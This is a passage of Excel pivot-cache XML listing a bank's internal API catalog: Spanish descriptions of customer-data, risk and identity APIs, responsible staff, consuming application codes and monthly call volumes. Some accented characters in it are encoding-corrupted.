    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ SEG_NU0064001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ Networking_NU0046001 _x000d__x000a_ TMP_AW0955 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ Thanos_AW1326001 _x000d__x000a_ SucursalVirtualValores_AW0638 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001 _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ SVPSucursalVirtualPersonas_NU0149001 _x000d__x000a_ PSE-Pagos-Seguros-en-linea_NU0152001 _x000d__x000a_ AccountOpening_AW1480001 _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ PricingBusiness_NU0091001 _x000d__x000a_ salesforceAdapter_NU0254001 _x000d__x000a_ Galatea_NU0051001"/>
    <n v="2606116"/>
    <n v="2459726"/>
    <n v="2282047"/>
    <n v="8581277"/>
    <n v="9406094"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-19T12:32:28"/>
    <s v="Customer Personal Summary Data"/>
    <n v="100"/>
    <s v="Customer Personal Summary Data - Information"/>
    <n v="100"/>
    <s v="customer-personal-summary-data-information"/>
    <s v="Permite realizar la consulta de los datos personales del cliente Colombia, tanto para persona jurí­dica como para persona natural."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <m/>
    <m/>
    <s v="LoansOffer_NU0102001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-05-11T18:23:02"/>
    <s v="Customer Portfolio"/>
    <n v="100"/>
    <s v="Customer Portfolio - External Sources"/>
    <n v="100"/>
    <s v="customer-portfolio-external-sources"/>
    <s v="Permite consultar información de diferentes fuentes píºblicas desde aplicaciones  que requieran acceder a este tipo de información. Ej: BDUA, RUES, RUNT, RUAF, PROCURADURí?A, SISBEN, DIAN, entre otras."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <s v="ConsultaFuentesPublicasExternas/V1.0"/>
    <s v="Konivin - Vennko"/>
    <s v="MonitoreoDCM_NU0084001"/>
    <n v="60497"/>
    <n v="46015"/>
    <n v="45228"/>
    <n v="44692"/>
    <n v="37815"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-09-27T20:10:51"/>
    <s v="Customer Portfolio"/>
    <n v="120"/>
    <s v="Customer Portfolio - External Sources"/>
    <n v="120"/>
    <s v="customer-portfolio-external-sources"/>
    <s v="Permite consultar información de diferentes fuentes píºblicas desde aplicaciones  que requieran acceder a este tipo de información. Ej: BDUA, RUES, RUNT, RUAF, PROCURADURí?A, SISBEN, DIAN, entre otras."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <s v="ConsultaFuentesPublicasExternas/V1.0"/>
    <s v="Konivin - Vennko"/>
    <s v="GestionaNegocios_AW1302001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ APM_AW1081001 _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ VINCUTRANS_NU0034001"/>
    <n v="60497"/>
    <n v="46015"/>
    <n v="45228"/>
    <n v="44692"/>
    <n v="37815"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-12-02T08:44:49"/>
    <s v="Customer Product Eligibility"/>
    <n v="203"/>
    <s v="Customer Product Elegibility - Habitat"/>
    <n v="103"/>
    <s v="customer-product-elegibility-habitat"/>
    <s v="Esta API permite consultar la recomendación de diversos productos a los clientes basado en la analí­tica de su comportamiento y perfilamiento financiero. El origen de esta analí­tica de perfilamiento de productos es dictaminado por los datos con los que cuenta el banco de cada uno de sus clientes, analizando así­ que tipo de productos son los más cercanos a su realidad personal y financiera. Aquí­ podemos encontrar la operación que permite la recomendación de productos de vivienda."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001"/>
    <n v="5709"/>
    <n v="4176"/>
    <n v="2291"/>
    <n v="813"/>
    <n v="913"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-04T17:24:23"/>
    <s v="Customer Product Eligibility"/>
    <n v="203"/>
    <s v="Customer Product Elegibility - Vehicles"/>
    <n v="101"/>
    <s v="customer-product-eligibility-vehicles"/>
    <s v="Esta API permite consultar la recomendación de diversos productos a los clientes basado en la analí­tica de su comportamiento y perfilamiento financiero. El origen de esta analí­tica de perfilamiento de productos es dictaminado por los datos con los que cuenta el banco de cada uno de sus clientes, analizando así­ que tipo de productos son los más cercanos a su realidad personal y financiera. Aquí­ podemos encontrar la operación que permite la recomendación de productos de vehiculo."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001"/>
    <n v="2158"/>
    <n v="1680"/>
    <n v="1759"/>
    <n v="35"/>
    <n v="18"/>
    <x v="4"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-08-27T13:42:26"/>
    <s v="Customer Product Service Eligibility"/>
    <n v="100"/>
    <s v="Customer Product/Service Elegibility  Vehicles"/>
    <n v="100"/>
    <s v="customer-product-service-eligibility"/>
    <s v="Proveedor de OAuth que cambia Id de sesión por un Token de acceso para canales virtuales"/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="tu 360movilidad"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="1748"/>
    <n v="2877"/>
    <n v="4520"/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-06-30T17:02:26"/>
    <s v="Customer Products"/>
    <n v="100"/>
    <s v="Customer Products Natural Person"/>
    <n v="100"/>
    <s v="customer-products-natural-person"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la información de los productos que posee un cliente en el banco."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <m/>
    <s v="PORTALCOBRANZA_AW1294001"/>
    <n v="1"/>
    <n v="23"/>
    <n v="736"/>
    <n v="13533"/>
    <n v="60179"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-06-30T17:02:26"/>
    <s v="Customer Products"/>
    <n v="100"/>
    <s v="Customer Products Relationship Management"/>
    <n v="100"/>
    <s v="customer-products-relationship-management"/>
    <s v="A través de esta API se puede administrar la Relación Cliente-Producto, permitiendo crear, editar o eliminar registros."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <m/>
    <s v="PORTALCOBRANZA_AW1294001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-01-27T15:12:20"/>
    <s v="Customer Profile Information"/>
    <n v="103"/>
    <s v="Customer Profile Information - Private External Sources"/>
    <n v="103"/>
    <s v="customer-profile-information-private-external-sources"/>
    <s v="El API permite obtener una  información detallada de una persona natural o jurí­dica, este detalle da a conocer la localización geográfica, validación de direcciones, teléfonos, celulares, correos electrónicos, los datos de contacto, parámetros de usuarios y productos relacionados a esta persona, dependiendo de su tipo y numero de documento y el primer apellido."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001 _x000d__x000a_ APP_AW1318001"/>
    <m/>
    <m/>
    <m/>
    <n v="2"/>
    <n v="2"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-12-04T09:56:25"/>
    <s v="Customer Profile Product"/>
    <n v="100"/>
    <s v="Customer Profile Product - Information"/>
    <n v="100"/>
    <s v="customer-profile-product-information"/>
    <s v="Esta API permite identificar informacion sobre un cliente con base en la informacion de expirian "/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="CPPALM_AW1086001 _x000d__x000a_ RespuestaAlFrente_AW1086001 _x000d__x000a_ ConsultaInformacionBuroCredito_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="2"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-11-30T09:14:03"/>
    <s v="Customer Reference Data Mgmt"/>
    <n v="102"/>
    <s v="Customer Reference Data Mgmt - Bank Statements"/>
    <n v="102"/>
    <s v="customer-reference-data-bank-statements"/>
    <s v="El API permite obtener los periodos disponibles para consulta y los extractos, de los productos de un cliente. El extracto se genera en formato Base64, para que el consumidor pueda posteriormente decodificarlo a un formato como PDF."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <s v="ConsultaExtractosCliente/V1.0"/>
    <s v="Paradoc - Extracto Unificado FE_EUC,COLD,EBP, MAM_AW0826001"/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ Thanos_AW1326001"/>
    <n v="45035"/>
    <n v="40844"/>
    <n v="43006"/>
    <n v="213670"/>
    <n v="575549"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-01-19T16:36:17"/>
    <s v="Customer Relationships Data"/>
    <n v="101"/>
    <s v="Customer Relationships Data - Information"/>
    <n v="101"/>
    <s v="customer-relationships-data-information"/>
    <s v="Permite consultar la información de las relaciones o ví­nculos del cliente, por ejemplo: Referencia comercial, referencia personal, referencia familiar, abogado, ejecutivo de portafolio, entre otros."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosRelacionesCliente/V1.0"/>
    <m/>
    <s v="AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ AppSarlaft_AW1176001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ PricingBusiness_NU0091001 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <n v="234"/>
    <n v="2780"/>
    <n v="271"/>
    <n v="1164"/>
    <n v="867"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-26T15:33:58"/>
    <s v="Customer Tracking"/>
    <n v="103"/>
    <s v="Customer Request Tracking"/>
    <n v="103"/>
    <s v="customer-request-tracking"/>
    <s v="La Api ofrece a los consumidores, la capacidad de registrar las novedades de los servicios que tiene como cliente."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <m/>
    <s v="SAPCRM_AW0611001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="9330"/>
    <n v="16286"/>
    <n v="18003"/>
    <n v="22346"/>
    <n v="52757"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-08-26T16:07:59"/>
    <s v="Customer Tracking"/>
    <n v="205"/>
    <s v="Customer Request Tracking"/>
    <n v="205"/>
    <s v="customer-request-tracking"/>
    <s v="La Api ofrece a los consumidores, la capacidad de registrar las novedades de los servicios que tiene como cliente."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <s v=""/>
    <m/>
    <s v="Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ TRACKINGSIM_NU0098001 _x000d__x000a_ SAPCRM_AW0611001 _x000d__x000a_ TRACKING_NU0098001"/>
    <n v="9330"/>
    <n v="16286"/>
    <n v="18003"/>
    <n v="22346"/>
    <n v="52757"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-02-18T15:47:06"/>
    <s v="Customer Risk"/>
    <n v="103"/>
    <s v="Customer Risk - Group"/>
    <n v="101"/>
    <s v="customer-risk-group"/>
    <s v="Esta API permite exponer el grupo de riesgo al que pertenece un cliente y el detalle de los integrantes que conforman dicho grupo. Un grupo de riesgo es un conjunto de personas naturales y/o jurí­dicas que se relacionan entre sí­; por ví­nculos de capital y subordinación, administrativos, de negocio, familiares, entre otras; que implican un riesgo en comíºn entre las partes. Para consolidar los grupos de riesgos se tiene en cuenta los motivos de conformación que se establecen en el titulo 2 y 3 del Decreto 2555 regulado por la Superintendencia Financiera de Colombia (Lí­mites individuales de crédito y concentración de riesgo). Los grupos están clasificados por: '¢_x0009_Legales: Son los que cumplen los motivos legales del Decreto, es decir, que son soportados. '¢_x0009_Internos: Estos son grupos administrativos que no necesariamente cumplen el motivo legal, pero que internamente se identifica un riesgo comíºn desde el conocimiento del cliente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Gestion integral del riesgo"/>
    <s v="Productor Transversal"/>
    <m/>
    <s v="David Esteban Lugo Posada"/>
    <s v="ConsultaGruposDeRiesgo/V1.0"/>
    <m/>
    <s v="PORTALCOBRANZA_AW1294001 _x000d__x000a_ DELFINWEB_AW0748001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ GruposDeRiesgo_AW1294001 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="391"/>
    <n v="114"/>
    <n v="91"/>
    <n v="1588"/>
    <n v="1722"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-10-09T15:15:27"/>
    <s v="Tec-Customer Risk"/>
    <n v="200"/>
    <s v="Customer Risk - Group"/>
    <n v="200"/>
    <s v="customer-risk-group"/>
    <s v="Esta API permite exponer el grupo de riesgo al que pertenece un cliente y el detalle de los integrantes que conforman dicho grupo. Un grupo de riesgo es un conjunto de personas naturales y/o jurí­dicas que se relacionan entre sí­; por ví­nculos de capital y subordinación, administrativos, de negocio, familiares, entre otras; que implican un riesgo en comíºn entre las partes. Para consolidar los grupos de riesgos se tiene en cuenta los motivos de conformación que se establecen en el titulo 2 y 3 del Decreto 2555 regulado por la Superintendencia Financiera de Colombia (Lí­mites individuales de crédito y concentración de riesgo). Los grupos están clasificados por: '¢_x0009_Legales: Son los que cumplen los motivos legales del Decreto, es decir, que son soportados. '¢_x0009_Internos: Estos son grupos administrativos que no necesariamente cumplen el motivo legal, pero que internamente se identifica un riesgo comíºn desde el conocimiento del cliente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Gestion integral del riesgo"/>
    <s v="Productor Transversal"/>
    <m/>
    <s v="David Esteban Lugo Posada"/>
    <s v="ConsultaGruposDeRiesgo/V1.0"/>
    <m/>
    <s v="CentralesPrecalculadas_NU0032001 _x000d__x000a_ GruposDeRiesgo_AW1294001 _x000d__x000a_ PORTALCOBRANZA_AW1294001"/>
    <n v="391"/>
    <n v="114"/>
    <n v="91"/>
    <n v="1588"/>
    <n v="1722"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-19T16:48:02"/>
    <s v="Customer Risk Behavior"/>
    <n v="101"/>
    <s v="Customer Risk Behavior - Assessment"/>
    <n v="101"/>
    <s v="customer-risk-behavior-assessment"/>
    <s v="El API Customer Risk Behavior - Assessment V1.0.1 se encarga de consultar las centrales Internas del cliente, recuperando la calificación obtenida segíºn el endeudamiento que presente el mismo, al momento de la consulta"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="CentralesPrecalculadas_NU0032001 _x000d__x000a_ EASYHOME_NU0004001"/>
    <n v="46259"/>
    <n v="43849"/>
    <n v="37500"/>
    <n v="36910"/>
    <n v="48779"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-12-07T16:37:01"/>
    <s v="Customer Risk"/>
    <n v="103"/>
    <s v="Customer Risk Behavior - Assessment"/>
    <n v="102"/>
    <s v="customer-risk-behavior-assessment"/>
    <s v="El API Customer Risk Behavior - Assessment V1.0.1 se encarga de consultar las centrales Internas del cliente, recuperando la calificación obtenida segíºn el endeudamiento que presente el mismo, al momento de la consulta"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="CentralesPrecalculadas_NU0032001 _x000d__x000a_ BIZAGIBEG_AW1176001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ EASYHOME_NU0004001"/>
    <n v="46259"/>
    <n v="43849"/>
    <n v="37500"/>
    <n v="36910"/>
    <n v="48779"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-19T16:48:02"/>
    <s v="Customer Risk Behavior"/>
    <n v="103"/>
    <s v="Customer Risk Behavior - Credit Registries"/>
    <n v="103"/>
    <s v="customer-risk-behavior-credit-registries"/>
    <s v="El API Customer Risk Behavior - Credit Registries V1.0.0 se encarga de consultar las centrales externas del cliente, recuperando la calificación obtenida segíºn el endeudamiento que presente el mismo en entidades diferentes al grupo Bancolombia, al momento de la consulta"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="CentralesPrecalculadas_NU0032001 _x000d__x000a_ BIZAGIBEG_AW1176001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ EASYHOME_NU0004001"/>
    <n v="46404"/>
    <n v="45021"/>
    <n v="39019"/>
    <n v="37089"/>
    <n v="48918"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-28T15:48:33"/>
    <s v="Tec-Customer Risk"/>
    <n v="103"/>
    <s v="Customer Risk Validate Identity"/>
    <n v="111"/>
    <s v="tec-customer-risk-validate-identity"/>
    <s v="API permite validar la identidad de una persona natural, mediante la generación de preguntas sobre su información demográfica y crediticia entre otras."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="ConfirmarIdentidadPersonaEnDataCredito/V2.0"/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="PORTALCOBRANZA_AW1294001 _x000d__x000a_ DELFINWEB_AW0748001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ GruposDeRiesgo_AW1294001 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="4"/>
    <n v="1036"/>
    <n v="18729"/>
    <n v="19696"/>
    <n v="28966"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-09-11T17:55:26"/>
    <s v="Customer Security"/>
    <n v="101"/>
    <s v="Customer Security - Alias"/>
    <n v="101"/>
    <s v="customer-security-alias"/>
    <s v="Esta API en la Gestión del Alias ofrece la capacidad de registrar y modificar el alias, el cual hace referencia a la identidad que está accediendo a un servicio.  Un alias que se registre es utilizado íºnica y exclusivamente por un usuario, independiente del canal, por tanto, el primero que registre un alias lo reserva en todos los canales. Un usuario puede tener míºltiples alias, por canal. Así­ mismo, en la Consulta del Alias ofrece la capacidad de recolectar la información propia de un alias o de todos los alias, asociados a una identidad, así­ mismo de la información de esta."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="FUA_AW1291001"/>
    <n v="460"/>
    <n v="303"/>
    <n v="292"/>
    <n v="817"/>
    <n v="636"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-20T23:41:50"/>
    <s v="Customer Security"/>
    <n v="205"/>
    <s v="Customer Security - Alias"/>
    <n v="202"/>
    <s v="customer-security-alias"/>
    <s v="Esta API en la Gestión del Alias ofrece la capacidad de registrar y modificar el alias, el cual hace referencia a la identidad que está accediendo a un servicio.  Un alias que se registre es utilizado íºnica y exclusivamente por un usuario, independiente del canal, por tanto, el primero que registre un alias lo reserva en todos los canales. Un usuario puede tener míºltiples alias, por canal."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ SVPSucursalVirtualPersonas_NU0149001 _x000d__x000a_ PSE-Pagos-Seguros-en-linea_NU0152001"/>
    <n v="460"/>
    <n v="303"/>
    <n v="292"/>
    <n v="817"/>
    <n v="636"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-20T23:41:50"/>
    <s v="Customer Security"/>
    <n v="300"/>
    <s v="Customer Security - Alias"/>
    <n v="300"/>
    <s v="customer-security-alias"/>
    <s v="Esta API en la Gestión del Alias ofrece la capacidad de registrar y modificar el alias, el cual hace referencia a la identidad que está accediendo a un servicio.  Un alias que se registre es utilizado íºnica y exclusivamente por un usuario, independiente del canal, por tanto, el primero que registre un alias lo reserva en todos los canales. Un usuario puede tener míºltiples alias, por canal."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v=""/>
    <m/>
    <s v="BancolombiaPay_AW1435001 _x000d__x000a_ NU0046001_NETWORKING_MR _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ Galatea_NU0051001"/>
    <n v="460"/>
    <n v="303"/>
    <n v="292"/>
    <n v="817"/>
    <n v="636"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-09-11T17:55:26"/>
    <s v="Customer Security"/>
    <n v="101"/>
    <s v="Customer Security - Identity"/>
    <n v="101"/>
    <s v="customer-security-identity"/>
    <s v="Esta API en la Gestión de la Identidad ofrece la capacidad de registrar y modificar la identidad como íºnica dentro de los canales del banco, es decir, registrar y modificar las caracterí­sticas de una persona que permiten distinguirla de otras en un conjunto. Así­ mismo, en la Consulta de la Identidad ofrece la capacidad de recolectar la información propia de la identidad."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="FUA_AW1291001"/>
    <n v="35557207"/>
    <n v="30989380"/>
    <n v="34232079"/>
    <n v="29950100"/>
    <n v="36910813"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-20T23:41:50"/>
    <s v="Customer Security"/>
    <n v="205"/>
    <s v="Customer Security - Identity"/>
    <n v="205"/>
    <s v="customer-security-identity"/>
    <s v="Esta API en la Gestión de la Identidad ofrece la capacidad de registrar y modificar la identidad como íºnica dentro de los canales del banco, es decir, registrar y modificar las caracterí­sticas de una persona que permiten distinguirla de otras en un conjunto. Así­ mismo, en la Consulta de la Identidad ofrece la capacidad de recolectar la información propia de la identidad."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ SVPSucursalVirtualPersonas_NU0149001 _x000d__x000a_ PSE-Pagos-Seguros-en-linea_NU0152001"/>
    <n v="35557207"/>
    <n v="30989380"/>
    <n v="34232079"/>
    <n v="29950100"/>
    <n v="36910813"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-20T23:41:50"/>
    <s v="Customer Security"/>
    <n v="300"/>
    <s v="Customer Security - Identity"/>
    <n v="300"/>
    <s v="customer-security-identity"/>
    <s v="Esta API en la Gestión de la Identidad ofrece la capacidad de registrar y modificar la identidad como íºnica dentro de los canales del banco, es decir, registrar y modificar las caracterí­sticas de una persona que permiten distinguirla de otras en un conjunto. Así­ mismo, en la Consulta de la Identidad ofrece la capacidad de recolectar la información propia de la identidad."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v=""/>
    <m/>
    <s v="BancolombiaPay_AW1435001 _x000d__x000a_ NU0046001_NETWORKING_MR _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ Galatea_NU0051001"/>
    <n v="35557207"/>
    <n v="30989380"/>
    <n v="34232079"/>
    <n v="29950100"/>
    <n v="36910813"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-07-21T14:49:28"/>
    <s v="Customer Data Sufi"/>
    <n v="110"/>
    <s v="Customers"/>
    <n v="100"/>
    <s v="customers"/>
    <s v="API para consulta de datos generales Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="adaptadorSufi_NU0204001"/>
    <m/>
    <m/>
    <m/>
    <n v="2"/>
    <n v="5"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-20T16:27:53"/>
    <s v="Customers Case Management"/>
    <n v="100"/>
    <s v="Customers Case Management-Customers Case"/>
    <n v="100"/>
    <s v="customers-case-management-customers-case"/>
    <s v="Permite la Administración de la creación de solicitudes de un Cliente"/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
